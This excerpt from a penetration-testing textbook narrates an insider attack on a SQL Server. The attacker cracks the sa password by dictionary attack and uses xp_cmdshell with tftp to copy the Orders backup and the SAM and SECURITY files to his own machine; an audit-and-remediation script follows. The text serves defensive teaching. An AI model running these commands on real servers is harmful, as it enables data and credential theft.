Case Study

Jimmy has been working for SupaLaptops Direct Inc. for eight months since he graduated. He was hired to do temporary support work, but he figured that with his skills, his boss would surely realize that he was indispensable and keep him on permanently. However, yesterday he found out that he would not be needed past the end of the week. He cannot believe the company would overlook his abilities. After all, he probably has more talent than the rest of the department combined. Well, if these people did not know it now, they soon would, because Jimmy is about to show them what they are throwing away.

As a junior member of the team, Jimmy does not have much administrative access, but he knows the database that supports the online ordering system has some valuable data on it. He decides to make this data his.

Step 1.

Using the osql tool with the -L (list servers) switch, Jimmy discovers that several other SQL servers are on the network in addition to the one he is interested in. Figure 8-14 shows the results of running this command.

Figure 8-14. Results from osql -L Command


Now that Jimmy knows the server is available and the SQL Server service is running, his next task is to gain access to it. He decides to use SQLPing to confirm the details of his target, as shown in Figure 8-15.

Figure 8-15. SQL Ping Utility


Step 2.

Jimmy figures he should check whether an sa password exists because so many servers out there have a blank password. Once again, he uses the osql tool to attempt to log in to the SQL server. Figure 8-16 shows that on this occasion, at least the most obvious errors have not been made.

Figure 8-16. Attempt to Log In with Blank sa Password


Step 3.

Jimmy pulls out the next tool in his toolkit, SQLDict, and loads an English word list that he obtained from ftp://ftp.ox.ac.uk/pub/wordlists. It takes a little time, but he is in no hurry. Eventually he strikes gold, as Figure 8-17 shows. Now he has the holy grail, the sa password, and he can log in to the server as sysadmin with full access to all objects and data.

Figure 8-17. Successfully Obtaining the sa Password with SQLDict


Jimmy can now log in to the server, browse, and damage at will. However, he figures it would be more useful to get his hands on the actual data files.

Step 4.

To find out which databases are available to him, Jimmy interrogates the system table sysdatabases using osql. Figure 8-18 shows a successful login to the server using the newly found sa password and a subsequent query to discover the names of the databases on the SQL server. Not only does Jimmy locate some interesting-sounding databases like Customers, but he also notices that the sample databases Northwind and pubs are still in evidence.

Figure 8-18. Query on sysdatabases Table


Now Jimmy knows which databases he needs to target. The easiest way to obtain data files is to find the database backup files. Although backups usually go to tape, it is common to back up SQL Server databases to disk initially and then to back up the disk to tape. Backups to disk are considerably quicker, and the cost of disk space is relatively small.

Step 5.

Using the stored procedure sp_helpdevice, Jimmy quickly discovers the location of the backups on disk. Only the formality of copying the files remains, and this he accomplishes by using the xp_cmdshell stored procedure and TFTP in this way:

xp_cmdshell 'tftp JimmyPC PUT "C:\Program Files\Microsoft SQL Server\MSSQL\Backup\Orders.BAK"'

Mission accomplished! Jimmy has a copy of the Orders database, which he can restore at his leisure to another SQL server. More than this, he has succeeded in transferring this backup file without anything appearing in an event log, and without the need for authentication.

Step 6.

Knowing that the usefulness of xp_cmdshell stretches far beyond databases, Jimmy thinks it also would be nice to have a copy of the SAM database from this computer. He runs xp_cmdshell again:

xp_cmdshell 'dir c:\WINNT\system32\repair'

Note

The SAM file is an operating system file containing details of all local users and their passwords. An unlocked backup copy can be found in the repair directory.

Jimmy gets a file listing confirming that the two files he is interested in are in their expected location. (See Figure 8-19.)

Figure 8-19. Directory Listing Using xp_cmdshell


Step 7.

Jimmy plans to use a password brute-forcing tool to gain the Administrator password. He knows that he will probably need both the SAM and SECURITY files to do this. Using the tftp command again, he copies these files to his local machine.

Note

Password cracking is covered fully in Chapter 9, "Cracking Passwords." There, you will see another tool called pwdump that you can use to extract usernames and passwords from an active SAM file.


Jimmy now has a copy of one of the most critical databases in the company, and ultimately the means to access the database server as an administrator at any time.

The company probably thought that giving a junior and temporary member of staff limited privileges to its systems would be safe. However, the company's error was in assuming that SQL Server security was adequate to protect its data. Although the company did not leave the sa account with a blank password, the one it had used was short and simple, easily brute forced with a dictionary attack.

It is useless to have a high-security lock if the key is under the doormat. Even if it is impossible to make a system impenetrable, had the job been slower and trickier, Jimmy would have been more likely to give up, and only the most determined hacker would have succeeded.
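The case study turns on four conditions a database administrator can audit directly: an enabled sa login with a weak, unchecked password, xp_cmdshell available to sysadmin, sample databases left on a production server, and backups written to a disk path the service account can read. The T-SQL below is an added example, not code from the book; it assumes SQL Server 2005 or later, where the sys.* catalog views and the sp_configure option for xp_cmdshell exist (the server in the case study is SQL Server 2000, which predates them).

```sql
-- Added example (not from the book): audit and remediate the weaknesses
-- the case study exploited. Assumes SQL Server 2005 or later and a
-- sysadmin connection; run the SELECTs first, then the fixes you need.
SET NOCOUNT ON;

-- 1. The sa login. Jimmy got in because sa was enabled and its password was
--    short enough to fall to a dictionary attack.
SELECT name,
       is_disabled,
       is_policy_checked,        -- 1 = Windows password complexity enforced
       is_expiration_checked
FROM sys.sql_logins
WHERE sid = 0x01;                -- sa always has SID 0x01, even if renamed

-- 2. xp_cmdshell. Steps 5 to 7 used it to run tftp and dir as the service
--    account, with no SQL Server audit record of the file transfers.
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';      -- 0 = disabled (the default)

-- 3. Sample databases, which step 4 found still present on the server.
SELECT name
FROM sys.databases
WHERE name IN ('Northwind', 'pubs');

-- 4. Where backups are being written to disk (step 5 found them with
--    sp_helpdevice). Anything under a path readable by the service account
--    is one xp_cmdshell call away from leaving the server.
SELECT name, physical_name
FROM sys.backup_devices;

-- Remediation for what the checks above flag.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;  -- disable OS command execution
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

ALTER LOGIN sa WITH CHECK_POLICY = ON, CHECK_EXPIRATION = ON;
ALTER LOGIN sa DISABLE;          -- administer through named sysadmin logins

DROP DATABASE Northwind;
DROP DATABASE pubs;
```

Disabling sa and xp_cmdshell removes the two capabilities that carried Jimmy from a guessed password to the backup files and the SAM copy; the password policy setting then makes the remaining logins resist the dictionary attack that opened the door.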


    Penetration Testing and Network Defense
    ISBN: 1587052083
    Year: 2005
    Pages: 209